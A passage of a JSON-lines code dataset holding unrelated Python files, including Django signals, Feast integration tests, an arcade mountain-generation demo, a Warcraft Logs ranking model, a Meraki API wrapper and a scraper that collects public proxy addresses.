reply_to_message_id=msg['message_id'])\n return True\n","sub_path":"plugins/diversos.py","file_name":"diversos.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"299062424","text":"# -*- coding: ISO-8859-1 -*-\r\nfrom django.db.models.signals import post_save\r\n\r\ndef add_historico_oportunidade(sender, instance, signal, created, **kwargs):\r\n from tsm.oportunidade.models.historico import Historico\r\n oportunidadeHistorico = Historico(\r\n oportunidade=instance,\r\n nome_usuario_add=instance.criador.first_name+' '+instance.criador.last_name,\r\n nome_situacao=instance.situacao.nome,\r\n nome_tipotemperatura = instance.tipotemperatura.nome,\r\n nome_responsavel = instance.responsavel.first_name+' '+instance.responsavel.last_name,\r\n nome_lider = instance.lider.first_name+' '+instance.lider.last_name,\r\n valor = instance.valor,\r\n ponderado = instance.ponderado,\r\n temperatura_auto = instance.temperatura_auto,\r\n dtFechamento = instance.dtFechamento,\r\n obs = instance.obs,\r\n dtFechado = instance.dtFechado,\r\n )\r\n\r\n if instance.arquitetos:\r\n arquitetos_nome = []\r\n for arquiteto in instance.arquitetos.all():\r\n arquitetos_nome.append(arquiteto.first_name)\r\n\r\n oportunidadeHistorico.nome_arquitetos = ', '.join(arquitetos_nome)\r\n\r\n if instance.gpp:\r\n oportunidadeHistorico.nome_gpp = instance.gpp.first_name + ' ' + instance.gpp.last_name\r\n\r\n if instance.produto:\r\n oportunidadeHistorico.nome_produto=instance.produto.nome\r\n\r\n oportunidadeHistorico.save()\r\n\r\ndef add_historico_resposta(sender, instance, signal, created, **kwargs):\r\n from tsm.oportunidade.models.historicoresposta import HistoricoResposta\r\n respostaHistorico = HistoricoResposta(\r\n oportunidade=instance.oportunidade,\r\n nome_usuario_add=instance.oportunidade.criador.first_name+' '+instance.oportunidade.criador.last_name,\r\n questao_txt=instance.questao.pergunta,\r\n resposta_txt='SIM' if instance.resposta else 'NAO',\r\n )\r\n respostaHistorico.save()\r\n\r\ndef update_ponderado_oportunidade(sender, instance, *args, **kwargs):\r\n if instance.tipo not in ['G,P']:\r\n oportunidades = instance.tipotemperatura_set.all()\r\n oportunidades = oportunidades.filter(dtFechado__isnull=True)\r\n for oportunidade in oportunidades:\r\n oportunidade.ponderado = round(oportunidade.valor * (instance.perc/100),2)\r\n oportunidade.save()\r\n ","sub_path":"tsm/oportunidade/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"30344846","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 8 09:52:15 2020\n\n@author: Jacobsen\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\nCATEGORIES = [\"Angry\", \"Fear\", \"Happy\", \"Sad\", \"Surprise\", \"Neutral\"]\n\n\ndef prepare(filepath):\n IMG_SIZE = 48 # 48 in txt-based\n new_array = cv2.resize(filepath, (IMG_SIZE, IMG_SIZE))\n return new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n\n\nmodel = tf.keras.models.load_model(\"/Users/AlbertoK/Desktop/DTU/Januar2020/emotionalligent/dropoutCNN.model\")\n\n\nkey = cv2. waitKey(1)\nwebcam = cv2.VideoCapture(0)\n\nwhile True:\n try:\n check, frame = webcam.read()\n print(check) #prints true as long as the webcam is running\n print(frame) #prints matrix values of each framecd \n key = cv2.waitKey(1)\n \n grayFrame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n prediction = model.predict([prepare(grayFrame)])\n print(prediction) # will be a list in a list.\n \n text = CATEGORIES[np.where(prediction==np.max(prediction))[1][0]]\n print(text)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n scale = 1\n color = (0,0,0)\n thickness = cv2.FILLED\n \n cv2.putText(grayFrame, text, (200, 200), font, 1, color, thickness=2)\n cv2.imshow(\"Capturing\", grayFrame)\n \n if key == ord('q'):\n print(\"Turning off camera.\")\n webcam.release()\n print(\"Camera off.\")\n print(\"Program ended.\")\n cv2.destroyAllWindows()\n break\n \n except(KeyboardInterrupt):\n print(\"Turning off camera.\")\n webcam.release()\n print(\"Camera off.\")\n print(\"Program ended.\")\n cv2.destroyAllWindows()\n break\n\n\n\n","sub_path":"LivePredictor.py","file_name":"LivePredictor.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"133222818","text":"from datetime import datetime, timedelta\n\nimport pandas as pd\nimport pytest\n\nfrom feast.infra.offline_stores.offline_store import RetrievalJob\nfrom feast.type_map import python_type_to_feast_value_type\nfrom feast.value_type import ValueType\nfrom tests.data.data_creator import create_dataset, get_feature_values_for_dtype\nfrom tests.integration.feature_repos.repo_configuration import (\n IntegrationTestRepoConfig,\n construct_test_environment,\n)\nfrom tests.integration.feature_repos.universal.data_sources.bigquery import (\n BigQueryDataSourceCreator,\n)\nfrom tests.integration.feature_repos.universal.entities import driver\nfrom tests.integration.feature_repos.universal.feature_views import driver_feature_view\n\n\ndef entity_feature_types_ids(entity_type: ValueType, feature_dtype: str):\n return f\"entity_type:{str(entity_type)}-feature_dtype:{feature_dtype}\"\n\n\nentity_type_feature_dtypes = [\n (ValueType.INT32, \"int32\"),\n (ValueType.INT64, \"int64\"),\n (ValueType.STRING, \"float\"),\n (ValueType.STRING, \"bool\"),\n]\nGCP_CONFIG = IntegrationTestRepoConfig(\n provider=\"gcp\",\n offline_store_creator=BigQueryDataSourceCreator,\n online_store=\"datastore\",\n)\n\n\n# TODO: change parametrization to allow for other providers aside from gcp\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"entity_type,feature_dtype\",\n entity_type_feature_dtypes,\n ids=[\n entity_feature_types_ids(entity_type, feature_dtype)\n for entity_type, feature_dtype in entity_type_feature_dtypes\n ],\n)\n@pytest.mark.parametrize(\n \"feature_is_list\", [False], ids=lambda v: f\"feature_is_list:{str(v)}\"\n)\ndef test_entity_inference_types_match(entity_type, feature_dtype, feature_is_list):\n with construct_test_environment(GCP_CONFIG) as environment:\n df = create_dataset(entity_type, feature_dtype, feature_is_list)\n data_source = environment.data_source_creator.create_data_source(\n df,\n destination_name=environment.feature_store.project,\n field_mapping={\"ts_1\": \"ts\"},\n )\n fv = create_feature_view(feature_dtype, feature_is_list, data_source)\n fs = environment.feature_store\n\n try:\n # Don't specify value type in entity to force inference\n entity = driver(value_type=ValueType.UNKNOWN)\n fs.apply([fv, entity])\n\n entities = fs.list_entities()\n entity_type_to_expected_inferred_entity_type = {\n ValueType.INT32: ValueType.INT64,\n ValueType.INT64: ValueType.INT64,\n ValueType.FLOAT: ValueType.DOUBLE,\n ValueType.STRING: ValueType.STRING,\n }\n for entity in entities:\n assert (\n entity.value_type\n == entity_type_to_expected_inferred_entity_type[entity_type]\n )\n finally:\n environment.data_source_creator.teardown()\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"entity_type,feature_dtype\",\n entity_type_feature_dtypes,\n ids=[\n entity_feature_types_ids(entity_type, feature_dtype)\n for entity_type, feature_dtype in entity_type_feature_dtypes\n ],\n)\n@pytest.mark.parametrize(\n \"feature_is_list\", [True, False], ids=lambda v: f\"feature_is_list:{str(v)}\"\n)\ndef test_feature_get_historical_features_types_match(\n entity_type, feature_dtype, feature_is_list\n):\n with construct_test_environment(GCP_CONFIG) as environment:\n df = create_dataset(entity_type, feature_dtype, feature_is_list)\n data_source = environment.data_source_creator.create_data_source(\n df,\n destination_name=environment.feature_store.project,\n field_mapping={\"ts_1\": \"ts\"},\n )\n fv = create_feature_view(feature_dtype, feature_is_list, data_source)\n fs = environment.feature_store\n entity = driver()\n try:\n fs.apply([fv, entity])\n\n features = [f\"{fv.name}:value\"]\n df = pd.DataFrame()\n df[\"driver_id\"] = [\"1\", \"3\"] if entity_type == ValueType.STRING else [1, 3]\n now = datetime.utcnow()\n ts = pd.Timestamp(now).round(\"ms\")\n df[\"ts\"] = [\n ts - timedelta(hours=4),\n ts - timedelta(hours=2),\n ]\n historical_features = fs.get_historical_features(\n entity_df=df, features=features,\n )\n\n # TODO(adchia): pandas doesn't play well with nan values in ints. BQ will also coerce to floats if there are NaNs\n historical_features_df = historical_features.to_df()\n print(historical_features_df)\n if feature_is_list:\n assert_feature_list_types(feature_dtype, historical_features_df)\n else:\n assert_expected_historical_feature_types(\n feature_dtype, historical_features_df\n )\n assert_expected_arrow_types(\n feature_dtype, feature_is_list, historical_features\n )\n finally:\n environment.data_source_creator.teardown()\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"entity_type,feature_dtype\",\n entity_type_feature_dtypes,\n ids=[\n entity_feature_types_ids(entity_type, feature_dtype)\n for entity_type, feature_dtype in entity_type_feature_dtypes\n ],\n)\n@pytest.mark.parametrize(\n \"feature_is_list\", [False], ids=lambda v: f\"feature_is_list:{str(v)}\"\n)\ndef test_feature_get_online_features_types_match(\n entity_type, feature_dtype, feature_is_list\n):\n with construct_test_environment(GCP_CONFIG) as environment:\n df = create_dataset(entity_type, feature_dtype, feature_is_list)\n data_source = environment.data_source_creator.create_data_source(\n df,\n destination_name=environment.feature_store.project,\n field_mapping={\"ts_1\": \"ts\"},\n )\n fv = create_feature_view(feature_dtype, feature_is_list, data_source)\n fs = environment.feature_store\n\n features = [fv.name + \":value\"]\n entity = driver(value_type=ValueType.UNKNOWN)\n\n try:\n fs.apply([fv, entity])\n fs.materialize(environment.start_date, environment.end_date)\n driver_id_value = \"1\" if entity_type == ValueType.STRING else 1\n online_features = fs.get_online_features(\n features=features, entity_rows=[{\"driver\": driver_id_value}],\n ).to_dict()\n\n feature_list_dtype_to_expected_online_response_value_type = {\n \"int32\": \"int\",\n \"int64\": \"int\",\n \"float\": \"float\",\n \"string\": \"str\",\n \"bool\": \"bool\",\n }\n assert (\n type(online_features[\"value\"][0]).__name__\n == feature_list_dtype_to_expected_online_response_value_type[\n feature_dtype\n ]\n )\n finally:\n environment.data_source_creator.teardown()\n\n\ndef create_feature_view(feature_dtype, feature_is_list, data_source):\n return driver_feature_view(\n data_source,\n value_type=python_type_to_feast_value_type(\n feature_dtype,\n value=get_feature_values_for_dtype(feature_dtype, feature_is_list)[0],\n ),\n )\n\n\ndef assert_expected_historical_feature_types(\n feature_dtype: str, historical_features_df: pd.DataFrame\n):\n print(\"Asserting historical feature types\")\n feature_dtype_to_expected_historical_feature_dtype = {\n \"int32\": \"int64\",\n \"int64\": \"int64\",\n \"float\": \"float64\",\n \"string\": \"object\",\n \"bool\": \"bool\",\n }\n assert (\n str(historical_features_df.dtypes[\"value\"])\n == feature_dtype_to_expected_historical_feature_dtype[feature_dtype]\n )\n\n\ndef assert_feature_list_types(feature_dtype: str, historical_features_df: pd.DataFrame):\n print(\"Asserting historical feature list types\")\n # Note, these expected values only hold for BQ\n feature_list_dtype_to_expected_historical_feature_list_dtype = {\n \"int32\": \"int\",\n \"int64\": \"int\",\n \"float\": \"float\",\n \"string\": \"str\",\n \"bool\": \"bool\",\n }\n assert str(historical_features_df.dtypes[\"value\"]) == \"object\"\n # Note, this struct schema is only true for BQ and not for other stores\n assert (\n type(historical_features_df.value[0][\"list\"][0][\"item\"]).__name__\n == feature_list_dtype_to_expected_historical_feature_list_dtype[feature_dtype]\n )\n\n\ndef assert_expected_arrow_types(\n feature_dtype: str, feature_is_list: bool, historical_features: RetrievalJob\n):\n print(\"Asserting historical feature arrow types\")\n historical_features_arrow = historical_features.to_arrow()\n print(historical_features_arrow)\n feature_list_dtype_to_expected_historical_feature_arrow_type = {\n \"int32\": \"int64\",\n \"int64\": \"int64\",\n \"float\": \"double\",\n \"string\": \"string\",\n \"bool\": \"bool\",\n }\n arrow_type = feature_list_dtype_to_expected_historical_feature_arrow_type[\n feature_dtype\n ]\n if feature_is_list:\n assert (\n str(historical_features_arrow.schema.field_by_name(\"value\").type)\n == f\"struct> not null>\"\n )\n else:\n assert (\n str(historical_features_arrow.schema.field_by_name(\"value\").type)\n == arrow_type\n )\n","sub_path":"sdk/python/tests/integration/registration/test_universal_types.py","file_name":"test_universal_types.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"415349040","text":"def canConstruct(a):\r\n results= ''\r\n for element in a:\r\n results += str(element)\r\n num = int(results)\r\n s = 0\r\n #print(num)\r\n while(num):\r\n s += num%10\r\n num //=10\r\n if(s%3==0):\r\n return(\"Yes\")\r\n else:\r\n return(\"No\")\r\n\r\n\r\na = list(map(int, input().rstrip().split()))\r\nsy = canConstruct(a)\r\nprint(sy)\r\n","sub_path":"DIvBy3.py","file_name":"DIvBy3.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271417797","text":"import inflect\n\nclass WordRange:\n def __init__(self, start, end, inc=1):\n self.__value=start\n self.__end=end\n self.__inc=inc\n\n if inc > 0:\n self.__dir=1\n else:\n self.__dir=-1\n\n self.__converter = inflect.engine()\n\n\n def __iter__(self):\n return self\n\n def __next__(self):\n\n if self.__dir*self.__value >= self.__end * self.__dir:\n raise StopIteration\n\n word = self.__converter.number_to_words(self.__value)\n self.__value += self.__inc\n\n return word\n\n\n\ndef counter(stop):\n value=0\n while value < stop:\n print ('about to yield ' + str(value))\n yield value\n value += 1\n","sub_path":"python/python-lazy.py","file_name":"python-lazy.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"393584804","text":"import sys\r\nsys.path.append('E:\\\\Spider\\\\movie')\r\nfrom flask import Flask\r\nfrom learn.models.movie import db\r\n\r\ndef creat_app():\r\n app = Flask(__name__)\r\n \r\n app.config.from_object('learn.secure')\r\n app.config.from_object('learn.setting')\r\n \r\n register_blueprint(app)\r\n db.init_app(app)\r\n db.create_all(app=app)\r\n return app\r\n\r\ndef register_blueprint(app):\r\n from learn.web.movie import web\r\n app.register_blueprint(web)","sub_path":"movie/learn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"490039502","text":"import os\nimport glob\n\nos.chdir(os.path.dirname(__file__))\n\nthe_files = glob.glob(\"./**/*.dds\", recursive = True)\n\nfor file in the_files:\n for end in [\"de\", \"us\", \"es\", \"fr\", \"it\", \"ja\", \"sp\", \"en\", \"jp\", \"ge\"]:\n if \"_\"+end.upper()+\"_1.AMB\" not in file:\n continue\n if end == \"ge\": end = \"de\"\n if end == \"ja\": end = \"jp\"\n if end == \"en\": end = \"us\"\n other_place = file.replace(\"_base\", \"_\"+end)\n if not os.path.exists(os.path.dirname(other_place)):\n os.makedirs(os.path.dirname(other_place))\n os.rename(file, other_place)\n","sub_path":"examples/upscale_template/converted/rebase.py","file_name":"rebase.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638347944","text":"\"\"\"\nMountains Midpoint Displacement\n\nCreate a random mountain range.\nOriginal idea and some code from:\nhttps://bitesofcode.wordpress.com/2016/12/23/landscape-generation-using-midpoint-displacement/\n\nIf Python and Arcade are installed, this example can be run from the command line with:\npython -m arcade.examples.mountains_midpoint_displacement\n\"\"\"\n\n# Library imports\nimport arcade\nimport random\nimport bisect\n\nSCREEN_WIDTH = 1200\nSCREEN_HEIGHT = 700\nSCREEN_TITLE = \"Mountains Midpoint Displacement Example\"\n\n\n# Iterative midpoint vertical displacement\ndef midpoint_displacement(start, end, roughness, vertical_displacement=None,\n num_of_iterations=16):\n \"\"\"\n Given a straight line segment specified by a starting point and an endpoint\n in the form of [starting_point_x, starting_point_y] and [endpoint_x, endpoint_y],\n a roughness value > 0, an initial vertical displacement and a number of\n iterations > 0 applies the midpoint algorithm to the specified segment and\n returns the obtained list of points in the form\n points = [[x_0, y_0],[x_1, y_1],...,[x_n, y_n]]\n \"\"\"\n # Final number of points = (2^iterations)+1\n if vertical_displacement is None:\n # if no initial displacement is specified set displacement to:\n # (y_start+y_end)/2\n vertical_displacement = (start[1]+end[1])/2\n # Data structure that stores the points is a list of lists where\n # each sublist represents a point and holds its x and y coordinates:\n # points=[[x_0, y_0],[x_1, y_1],...,[x_n, y_n]]\n # | | |\n # point 0 point 1 point n\n # The points list is always kept sorted from smallest to biggest x-value\n points = [start, end]\n iteration = 1\n while iteration <= num_of_iterations:\n # Since the list of points will be dynamically updated with the new computed\n # points after each midpoint displacement it is necessary to create a copy\n # of the state at the beginning of the iteration so we can iterate over\n # the original sequence.\n # Tuple type is used for security reasons since they are immutable in Python.\n points_tup = tuple(points)\n for i in range(len(points_tup)-1):\n # Calculate x and y midpoint coordinates:\n # [(x_i+x_(i+1))/2, (y_i+y_(i+1))/2]\n midpoint = list(map(lambda x: (points_tup[i][x]+points_tup[i+1][x])/2,\n [0, 1]))\n # Displace midpoint y-coordinate\n midpoint[1] += random.choice([-vertical_displacement,\n vertical_displacement])\n # Insert the displaced midpoint in the current list of points\n bisect.insort(points, midpoint)\n # bisect allows to insert an element in a list so that its order\n # is preserved.\n # By default the maintained order is from smallest to biggest list first\n # element which is what we want.\n # Reduce displacement range\n vertical_displacement *= 2 ** (-roughness)\n # update number of iterations\n iteration += 1\n return points\n\n\ndef fix_points(points):\n last_y = None\n last_x = None\n new_list = []\n for point in points:\n x = int(point[0])\n y = int(point[1])\n\n if last_y is None or y != last_y:\n if last_y is None:\n last_x = x\n last_y = y\n\n x1 = last_x\n x2 = x\n y1 = last_y\n y2 = y\n\n new_list.append((x1, 0))\n new_list.append((x1, y1))\n new_list.append((x2, y2))\n new_list.append((x2, 0))\n\n last_x = x\n last_y = y\n\n x1 = last_x\n x2 = SCREEN_WIDTH\n y1 = last_y\n y2 = last_y\n\n new_list.append((x1, 0))\n new_list.append((x1, y1))\n new_list.append((x2, y2))\n new_list.append((x2, 0))\n\n return new_list\n\n\ndef create_mountain_range(start, end, roughness, vertical_displacement, num_of_iterations, color_start):\n\n shape_list = arcade.ShapeElementList()\n\n layer_1 = midpoint_displacement(start, end, roughness, vertical_displacement, num_of_iterations)\n layer_1 = fix_points(layer_1)\n\n color_list = [color_start] * len(layer_1)\n lines = arcade.create_rectangles_filled_with_colors(layer_1, color_list)\n shape_list.append(lines)\n\n return shape_list\n\n\nclass MyGame(arcade.Window):\n \"\"\"\n Main application class.\n \"\"\"\n\n def __init__(self, width, height, title):\n super().__init__(width, height, title)\n\n self.mountains = None\n\n arcade.set_background_color(arcade.color.WHITE)\n\n def setup(self):\n \"\"\"\n This, and any function with the arcade.decorator.init decorator,\n is run automatically on start-up.\n \"\"\"\n self.mountains = []\n\n background = arcade.ShapeElementList()\n\n color1 = (195, 157, 224)\n color2 = (240, 203, 163)\n points = (0, 0), (SCREEN_WIDTH, 0), (SCREEN_WIDTH, SCREEN_HEIGHT), (0, SCREEN_HEIGHT)\n colors = (color1, color1, color2, color2)\n rect = arcade.create_rectangle_filled_with_colors(points, colors)\n\n background.append(rect)\n self.mountains.append(background)\n\n layer_4 = create_mountain_range([0, 350], [SCREEN_WIDTH, 320], 1.1, 250, 8, (158, 98, 204))\n self.mountains.append(layer_4)\n\n layer_3 = create_mountain_range([0, 270], [SCREEN_WIDTH, 190], 1.1, 120, 9, (130, 79, 138))\n self.mountains.append(layer_3)\n\n layer_2 = create_mountain_range([0, 180], [SCREEN_WIDTH, 80], 1.2, 30, 12, (68, 28, 99))\n self.mountains.append(layer_2)\n\n layer_1 = create_mountain_range([250, 0], [SCREEN_WIDTH, 200], 1.4, 20, 12, (49, 7, 82))\n self.mountains.append(layer_1)\n\n def on_draw(self):\n \"\"\"\n Render the screen.\n \"\"\"\n\n arcade.start_render()\n \"\"\"\n This is called every time we need to update our screen. About 60\n times per second.\n \n Just draw things in this function, don't update where they are.\n \"\"\"\n # Call our drawing functions.\n\n for mountain_range in self.mountains:\n mountain_range.draw()\n\n def on_mouse_press(self, x, y, button, key_modifiers):\n \"\"\"\n Called when the user presses a mouse button.\n \"\"\"\n pass\n\n\ndef main():\n \"\"\" Main method \"\"\"\n window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)\n window.setup()\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"arcade/examples/mountains_midpoint_displacement.py","file_name":"mountains_midpoint_displacement.py","file_ext":"py","file_size_in_byte":6589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"578009505","text":"\"\"\"Models for Top Rankings for a given Spec.\"\"\"\n\n# IMPORT STANDARD LIBRARIES\nimport datetime\n\n# IMPORT THIRD PARTY LIBRARIES\nimport arrow\nimport mongoengine as me\n\n# IMPORT LOCAL LIBRARIES\nfrom lorgs import utils\nfrom lorgs.logger import logger\nfrom lorgs.models import encounters\nfrom lorgs.models import warcraftlogs_base\nfrom lorgs.models import warcraftlogs_report\nfrom lorgs.models.specs import WowSpec\n\n\nclass SpecRanking(warcraftlogs_base.Document):\n\n spec_slug = me.StringField(required=True)\n boss_slug = me.StringField(required=True)\n\n updated = me.DateTimeField(default=datetime.datetime.utcnow)\n\n reports = me.ListField(me.EmbeddedDocumentField(warcraftlogs_report.Report))\n\n meta = {\n 'indexes': [\n (\"boss_slug\", \"spec_slug\"),\n \"spec_slug\",\n \"boss_slug\",\n ]\n }\n\n ##########################\n # Attributes\n #\n @property\n def spec(self):\n return WowSpec.get(full_name_slug=self.spec_slug)\n\n @property\n def boss(self):\n return encounters.RaidBoss.get(name_slug=self.boss_slug)\n\n @property\n def fights(self):\n return utils.flatten(report.fights for report in self.reports)\n\n @property\n def players(self):\n return utils.flatten(fight.players for fight in self.fights)\n\n @property\n def update_age(self):\n now = arrow.utcnow()\n old = arrow.get(self.updated)\n return now - old\n\n @property\n def update_age_fmt(self):\n now = arrow.utcnow()\n old = arrow.get(self.updated)\n return old.humanize(now, only_distance=True)\n\n ##########################\n # Methods\n #\n def sort_reports(self):\n \"\"\"Sort the reports in place by the highest dps player.\"\"\"\n def get_dps(report):\n top = 0\n for fight in report.fights:\n for player in fight.players:\n top = max(top, player.total)\n return top\n self.reports = sorted(self.reports, key=get_dps, reverse=True)\n\n ##########################\n # Query\n #\n async def load(self, limit=50, clear_old=False):\n \"\"\"Get Top Ranks for a given boss and spec.\"\"\"\n logger.info(f\"{self.boss.name} vs. {self.spec.name} {self.spec.wow_class.name} START | limit={limit} | clear_old={clear_old}\")\n\n # Build and run the query\n query = f\"\"\"\\\n worldData\n {{\n encounter(id: {self.boss.id})\n {{\n characterRankings(\n className: \"{self.spec.wow_class.name_slug_cap}\",\n specName: \"{self.spec.name_slug_cap}\",\n metric: {self.spec.role.metric},\n includeCombatantInfo: false,\n )\n }}\n }}\n \"\"\"\n\n # serverRegion: \"EU\",\n query_result = await self.client.query(query)\n query_result = query_result.get(\"worldData\", {}).get(\"encounter\", {}).get(\"characterRankings\", {})\n\n rankings = query_result.get(\"rankings\", [])\n if limit:\n rankings = rankings[:limit]\n\n if clear_old:\n self.reports = []\n\n #########################\n #\n #\n old_reports = []\n for report in self.reports:\n for fight in report.fights:\n for player in fight.players:\n key = (report.report_id, fight.fight_id, player.name)\n old_reports.append(key)\n\n new_fights = []\n for ranking_data in rankings:\n report_data = ranking_data.get(\"report\", {})\n\n # skip hidden reports\n if ranking_data.get(\"hidden\"):\n continue\n\n ################\n # check if already in the list\n key = (\n report_data.get(\"code\", \"\"),\n report_data.get(\"fightID\"),\n ranking_data.get(\"name\")\n )\n if key in old_reports:\n continue\n\n ################\n # Report\n report = report = warcraftlogs_report.Report()\n report.report_id = report_data.get(\"code\", \"\")\n report.start_time = report_data.get(\"startTime\", 0)\n self.reports.append(report)\n\n ################\n # Fight\n fight = report.add_fight()\n fight.fight_id = report_data.get(\"fightID\")\n fight.start_time = ranking_data.get(\"startTime\", 0) - report.start_time\n fight.end_time = fight.start_time + ranking_data.get(\"duration\", 0)\n\n ################\n # Player\n player = fight.add_player()\n player.spec_slug = self.spec_slug\n player.source_id = -1\n player.name = ranking_data.get(\"name\")\n player.total = ranking_data.get(\"amount\", 0)\n\n new_fights.append(fight)\n\n ########################\n # load casts\n #\n if new_fights:\n self.sort_reports()\n\n # enforce limit\n if limit:\n self.reports = self.reports[:limit]\n\n # the very first report/fight should always have the boss\n if self.fights:\n first_fight = self.fights[0]\n if not first_fight.boss_id:\n first_fight.add_boss(self.boss.id)\n if first_fight not in new_fights:\n new_fights.append(first_fight)\n\n if new_fights:\n logger.info(f\"{self.boss.name} vs. {self.spec.name} {self.spec.wow_class.name} load casts | {len(new_fights)} new fights\")\n await self.load_many(new_fights)\n\n self.updated = datetime.datetime.utcnow()\n","sub_path":"lorgs/models/warcraftlogs_ranking.py","file_name":"warcraftlogs_ranking.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"92412863","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/19 11:44 AM\n# @Author : zhongch4g\n# @Site : \n# @File : 560. Subarray Sum Equals K.py\n# @Software: IntelliJ IDEA\n\n\nclass Solution:\n def subarraySum(self, nums, k):\n nsum = 0\n # 保存值和索引\n d = {0:1}\n count = 0\n for i, num in enumerate(nums):\n nsum += num\n if nsum - k in d:\n count += d[nsum - k]\n d[nsum] = d.get(nsum, 0) + 1\n return count\n\n\nnums = [1,1,1]\nk = 2\nsolution = Solution()\nres = solution.subarraySum(nums, k)\nprint(res)\n\n","sub_path":"LeetCode/560. Subarray Sum Equals K.py","file_name":"560. Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321039245","text":"# IDLE 에서 각각 쳐서 확인해 볼 것\n\na, b = 5, 0\nc = a / b # error\n\n4 + 'spam' + 3 #error\n\n'3' + 3 #error\n\ntry:\n '3' + 3\nexcept TypeError:\n print( 'Exception : Type error ... stop program' )\n\ntry:\n '3' + 3\nexcept Exception:\n print( ' Exception : stop program' )\n\ntry:\n\t'3' + 3\nexcept Exception as e:\n\tprint( ' Exception [{0}] : stop program'.format( e ) )\n\ntry:\n\t3 + 3\nexcept Exception as e :\n\tprint( ' Exception [{0}] : stop program'.format( e ) )\nelse:\n\tprint( 'stop program' )\n\ntry:\n\t'3' + 3\nexcept Exception as e:\n\tprint( ' Exception [{0}] : stop program'.format( e ) )\nfinally:\n\tprint( 'Have a nice day^^' )\n\n","sub_path":"19.07.15.py","file_name":"19.07.15.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"392752474","text":"class MGSubnetPoolSettings(object):\n def __init__(self, session):\n super(MGSubnetPoolSettings, self).__init__()\n self._session = session\n \n def getNetworkCellularGatewaySettingsSubnetPool(self, networkId: str):\n \"\"\"\n **Return the subnet pool and mask configured for MGs in the network.**\n https://api.meraki.com/api_docs#return-the-subnet-pool-and-mask-configured-for-mgs-in-the-network\n \n - networkId (string)\n \"\"\"\n\n metadata = {\n 'tags': ['MG subnet pool settings'],\n 'operation': 'getNetworkCellularGatewaySettingsSubnetPool',\n }\n resource = f'/networks/{networkId}/cellularGateway/settings/subnetPool'\n\n return self._session.get(metadata, resource)\n\n def updateNetworkCellularGatewaySettingsSubnetPool(self, networkId: str, **kwargs):\n \"\"\"\n **Update the subnet pool and mask configuration for MGs in the network.**\n https://api.meraki.com/api_docs#update-the-subnet-pool-and-mask-configuration-for-mgs-in-the-network\n \n - networkId (string)\n - mask (integer): Mask used for the subnet of all MGs in this network.\n - cidr (string): CIDR of the pool of subnets. Each MG in this network will automatically pick a subnet from this pool.\n \"\"\"\n\n kwargs.update(locals())\n\n metadata = {\n 'tags': ['MG subnet pool settings'],\n 'operation': 'updateNetworkCellularGatewaySettingsSubnetPool',\n }\n resource = f'/networks/{networkId}/cellularGateway/settings/subnetPool'\n\n body_params = ['mask', 'cidr']\n payload = {k: v for (k, v) in kwargs.items() if k in body_params}\n\n return self._session.put(metadata, resource, payload)\n\n","sub_path":"meraki/api/mg_subnet_pool_settings.py","file_name":"mg_subnet_pool_settings.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"448979542","text":"from urllib.request import urlopen, Request\nfrom bs4 import BeautifulSoup\n\n\ndef get_proxy(page_no):\n url = \"https://www.xicidaili.com/nn/{}\".format(page_no)\n req = Request(url, headers={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'})\n response = urlopen(req)\n assert (response.getcode() == 200)\n response = response.read()\n\n result = []\n\n container = BeautifulSoup(response, 'html.parser')\n proxy_ips = container.table.find_all('tr')[1:]\n for proxy_ip in proxy_ips:\n elements = proxy_ip.find_all('td')\n protocol = elements[5].text\n if protocol != 'HTTPS':\n continue\n ip = elements[1].text\n port = elements[2].text\n proxy = \"https://{}:{}\".format(ip, port)\n result.append(proxy)\n\n return result\n\n\nwith open(\"proxy.txt\", 'a+') as file:\n for i in range(5):\n proxy_list = get_proxy(i + 1)\n file.writelines(\"%s\\n\" % proxy for proxy in 